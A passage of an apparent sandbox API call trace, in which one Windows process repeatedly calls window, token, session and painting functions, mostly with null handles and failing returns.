SetForegroundWindow (hWnd=0x0) returned 0 [0072.574] BringWindowToTop (hWnd=0x0) returned 0 [0072.574] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x71c) returned 1 [0072.574] GetTokenInformation (in: TokenHandle=0x71c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.575] GetLastError () returned 0x7a [0072.575] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.575] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.575] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.575] TextOutW (hdc=0x0, x=3154, y=7649, lpString="", c=0) returned 1 [0072.575] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.575] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.575] GetTickCount () returned 0x1f3b1 [0072.577] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.577] SetForegroundWindow (hWnd=0x0) returned 0 [0072.577] BringWindowToTop (hWnd=0x0) returned 0 [0072.577] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x720) returned 1 [0072.577] GetTokenInformation (in: TokenHandle=0x720, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.577] GetLastError () returned 0x7a [0072.577] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.577] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.578] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.578] TextOutW (hdc=0x0, x=3164, y=7674, lpString="", c=0) returned 1 [0072.578] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.578] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.578] GetTickCount () returned 0x1f3b1 [0072.578] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.578] SetForegroundWindow (hWnd=0x0) returned 0 [0072.578] BringWindowToTop (hWnd=0x0) returned 0 [0072.578] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x724) returned 1 [0072.578] GetTokenInformation (in: TokenHandle=0x724, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.578] GetLastError () returned 0x7a [0072.579] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.579] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.579] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.579] TextOutW (hdc=0x0, x=3174, y=7699, lpString="", c=0) returned 1 [0072.579] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.579] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.579] GetTickCount () returned 0x1f3b1 [0072.580] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.580] SetForegroundWindow (hWnd=0x0) returned 0 [0072.581] BringWindowToTop (hWnd=0x0) returned 0 [0072.581] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x728) returned 1 [0072.581] GetTokenInformation (in: TokenHandle=0x728, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.581] GetLastError () returned 0x7a [0072.581] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.581] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.582] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.582] TextOutW (hdc=0x0, x=3184, y=7724, lpString="", c=0) returned 1 [0072.582] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.582] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.582] GetTickCount () returned 0x1f3c1 [0072.583] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.583] SetForegroundWindow (hWnd=0x0) returned 0 [0072.583] BringWindowToTop (hWnd=0x0) returned 0 [0072.583] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x72c) returned 1 [0072.583] GetTokenInformation (in: TokenHandle=0x72c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.583] GetLastError () returned 0x7a [0072.583] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.583] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.583] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.583] TextOutW (hdc=0x0, x=3194, y=7749, lpString="", c=0) returned 1 [0072.583] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.583] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.583] GetTickCount () returned 0x1f3c1 [0072.584] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.584] SetForegroundWindow (hWnd=0x0) returned 0 [0072.584] BringWindowToTop (hWnd=0x0) returned 0 [0072.584] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x730) returned 1 [0072.584] GetTokenInformation (in: TokenHandle=0x730, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.584] GetLastError () returned 0x7a [0072.584] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.584] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.585] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.585] TextOutW (hdc=0x0, x=3204, y=7774, lpString="", c=0) returned 1 [0072.585] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.585] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.585] GetTickCount () returned 0x1f3c1 [0072.588] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.588] SetForegroundWindow (hWnd=0x0) returned 0 [0072.588] BringWindowToTop (hWnd=0x0) returned 0 [0072.589] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x734) returned 1 [0072.589] GetTokenInformation (in: TokenHandle=0x734, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.589] GetLastError () returned 0x7a [0072.589] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.589] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.589] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.589] TextOutW (hdc=0x0, x=3214, y=7799, lpString="", c=0) returned 1 [0072.589] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.589] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.589] GetTickCount () returned 0x1f3c1 [0072.592] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.592] SetForegroundWindow (hWnd=0x0) returned 0 [0072.592] BringWindowToTop (hWnd=0x0) returned 0 [0072.592] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x738) returned 1 [0072.592] GetTokenInformation (in: TokenHandle=0x738, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.592] GetLastError () returned 0x7a [0072.592] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.592] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.593] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.593] TextOutW (hdc=0x0, x=3224, y=7824, lpString="", c=0) returned 1 [0072.593] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.593] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.593] GetTickCount () returned 0x1f3c1 [0072.600] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.600] SetForegroundWindow (hWnd=0x0) returned 0 [0072.600] BringWindowToTop (hWnd=0x0) returned 0 [0072.600] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x73c) returned 1 [0072.600] GetTokenInformation (in: TokenHandle=0x73c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.600] GetLastError () returned 0x7a [0072.600] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.600] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.601] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.601] TextOutW (hdc=0x0, x=3234, y=7849, lpString="", c=0) returned 1 [0072.601] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.604] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.604] GetTickCount () returned 0x1f3d1 [0072.604] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.604] SetForegroundWindow (hWnd=0x0) returned 0 [0072.604] BringWindowToTop (hWnd=0x0) returned 0 [0072.604] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x740) returned 1 [0072.605] GetTokenInformation (in: TokenHandle=0x740, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.605] GetLastError () returned 0x7a [0072.605] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.605] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.605] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.605] TextOutW (hdc=0x0, x=3244, y=7874, lpString="", c=0) returned 1 [0072.605] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.605] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.605] GetTickCount () returned 0x1f3d1 [0072.606] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.606] SetForegroundWindow (hWnd=0x0) returned 0 [0072.606] BringWindowToTop (hWnd=0x0) returned 0 [0072.606] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x744) returned 1 [0072.606] GetTokenInformation (in: TokenHandle=0x744, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.606] GetLastError () returned 0x7a [0072.606] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.606] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.607] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.607] TextOutW (hdc=0x0, x=3254, y=7899, lpString="", c=0) returned 1 [0072.607] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.607] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.607] GetTickCount () returned 0x1f3d1 [0072.608] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.608] SetForegroundWindow (hWnd=0x0) returned 0 [0072.608] BringWindowToTop (hWnd=0x0) returned 0 [0072.608] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x748) returned 1 [0072.608] GetTokenInformation (in: TokenHandle=0x748, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.608] GetLastError () returned 0x7a [0072.608] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.608] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.608] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.608] TextOutW (hdc=0x0, x=3264, y=7924, lpString="", c=0) returned 1 [0072.608] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.608] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.608] GetTickCount () returned 0x1f3d1 [0072.610] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.610] SetForegroundWindow (hWnd=0x0) returned 0 [0072.610] BringWindowToTop (hWnd=0x0) returned 0 [0072.610] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x74c) returned 1 [0072.610] GetTokenInformation (in: TokenHandle=0x74c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.610] GetLastError () returned 0x7a [0072.610] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.610] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.611] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.611] TextOutW (hdc=0x0, x=3274, y=7949, lpString="", c=0) returned 1 [0072.611] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.611] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.611] GetTickCount () returned 0x1f3d1 [0072.612] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.612] SetForegroundWindow (hWnd=0x0) returned 0 [0072.613] BringWindowToTop (hWnd=0x0) returned 0 [0072.613] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x750) returned 1 [0072.613] GetTokenInformation (in: TokenHandle=0x750, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.613] GetLastError () returned 0x7a [0072.613] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.613] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.613] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.613] TextOutW (hdc=0x0, x=3284, y=7974, lpString="", c=0) returned 1 [0072.613] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.613] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.613] GetTickCount () returned 0x1f3e0 [0072.614] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.614] SetForegroundWindow (hWnd=0x0) returned 0 [0072.614] BringWindowToTop (hWnd=0x0) returned 0 [0072.614] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x754) returned 1 [0072.614] GetTokenInformation (in: TokenHandle=0x754, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.614] GetLastError () returned 0x7a [0072.614] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.614] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.614] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.615] TextOutW (hdc=0x0, x=3294, y=7999, lpString="", c=0) returned 1 [0072.615] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.615] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.615] GetTickCount () returned 0x1f3e0 [0072.615] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.615] SetForegroundWindow (hWnd=0x0) returned 0 [0072.615] BringWindowToTop (hWnd=0x0) returned 0 [0072.615] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x758) returned 1 [0072.615] GetTokenInformation (in: TokenHandle=0x758, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.615] GetLastError () returned 0x7a [0072.615] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.615] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.616] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.616] TextOutW (hdc=0x0, x=3304, y=8024, lpString="", c=0) returned 1 [0072.616] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.616] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.616] GetTickCount () returned 0x1f3e0 [0072.616] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.617] SetForegroundWindow (hWnd=0x0) returned 0 [0072.617] BringWindowToTop (hWnd=0x0) returned 0 [0072.617] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x75c) returned 1 [0072.617] GetTokenInformation (in: TokenHandle=0x75c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.617] GetLastError () returned 0x7a [0072.617] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.617] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.617] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.617] TextOutW (hdc=0x0, x=3314, y=8049, lpString="", c=0) returned 1 [0072.617] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.617] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.617] GetTickCount () returned 0x1f3e0 [0072.618] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.618] SetForegroundWindow (hWnd=0x0) returned 0 [0072.618] BringWindowToTop (hWnd=0x0) returned 0 [0072.618] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x760) returned 1 [0072.618] GetTokenInformation (in: TokenHandle=0x760, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.618] GetLastError () returned 0x7a [0072.618] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.618] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.619] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.619] TextOutW (hdc=0x0, x=3324, y=8074, lpString="", c=0) returned 1 [0072.619] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.619] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.619] GetTickCount () returned 0x1f3e0 [0072.619] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.620] SetForegroundWindow (hWnd=0x0) returned 0 [0072.620] BringWindowToTop (hWnd=0x0) returned 0 [0072.620] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x764) returned 1 [0072.620] GetTokenInformation (in: TokenHandle=0x764, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.620] GetLastError () returned 0x7a [0072.620] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.620] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.620] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.620] TextOutW (hdc=0x0, x=3334, y=8099, lpString="", c=0) returned 1 [0072.620] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.620] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.620] GetTickCount () returned 0x1f3e0 [0072.621] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.621] SetForegroundWindow (hWnd=0x0) returned 0 [0072.622] BringWindowToTop (hWnd=0x0) returned 0 [0072.622] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x768) returned 1 [0072.622] GetTokenInformation (in: TokenHandle=0x768, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.622] GetLastError () returned 0x7a [0072.622] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.622] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.622] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.622] TextOutW (hdc=0x0, x=3344, y=8124, lpString="", c=0) returned 1 [0072.622] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.622] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.622] GetTickCount () returned 0x1f3e0 [0072.623] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.623] SetForegroundWindow (hWnd=0x0) returned 0 [0072.623] BringWindowToTop (hWnd=0x0) returned 0 [0072.623] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x76c) returned 1 [0072.623] GetTokenInformation (in: TokenHandle=0x76c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.623] GetLastError () returned 0x7a [0072.623] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.623] 